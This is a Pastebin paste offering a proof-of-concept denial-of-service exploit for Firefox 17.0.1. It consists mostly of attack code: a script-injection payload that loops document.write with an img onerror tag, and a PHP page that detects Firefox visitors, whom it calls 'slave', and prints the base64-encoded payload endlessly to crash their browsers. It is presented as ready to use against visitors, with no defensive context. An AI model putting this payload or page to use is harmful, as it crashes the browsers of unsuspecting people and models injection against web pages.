Advertisement
Guest User

Mozilla Firefox HTML/JS DOS Vulnerability -

a guest
Dec 9th, 2012
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.46 KB | None | 0 0
  1. Title : Mozilla Firefox HTML/JS DOS Vulnerability - POC
  2. Version : Mozilla Firefox Beta Version and Normal 17.0.1
  3. Date : 2012-12-06
  4. Vendor : http://www.mozilla.org
  5. Impact : Medium
  6. Contact : sergioyoshiman [at] gmail.com
  7. Twitter : @sergioyoshiman
  8. tested : windows XP SP3 & Windows 7 SP1
  9. Author : Sergio Yoshikata - Lima , Peru
  10. ==============================================================
  11. Mozilla Firefox JS POC
  12. "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>
  13. ==============================================================
  14. Better way to explote the vulnerability is Using a PHP scripts that check's if slave is using firefox browser them
  15. print the crash exploit.
  16. ==============================================================
  17. <!DOCTYPE html>
  18. <html>
  19. <body>
  20. <?php
  21. /* Mozilla Firefox HTML/JS DOS Vulnerability - POC by Sergio Yoshikata - @sergioyoshiman
  22. Base64 encoded exploit "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>*/
  23. $exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0ZSAoJyI+PGltZyBzcmM9eCBvbmVycm9​yPWFsZXJ0KDIpPi9mb29iYXInKTt9PC9zY3JpcHQ+';
  24. //check if slave is Using Mozilla Firefox
  25. $firefox = strpos($_SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false;
  26. if ($firefox)
  27. {
  28. //loop forever
  29. while(1) {
  30. //print exploit code infinite times.
  31. print(base64_decode($exploit));
  32. }
  33. }
  34. ?>
  35. </body>
  36. </html>
  37. ==============================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement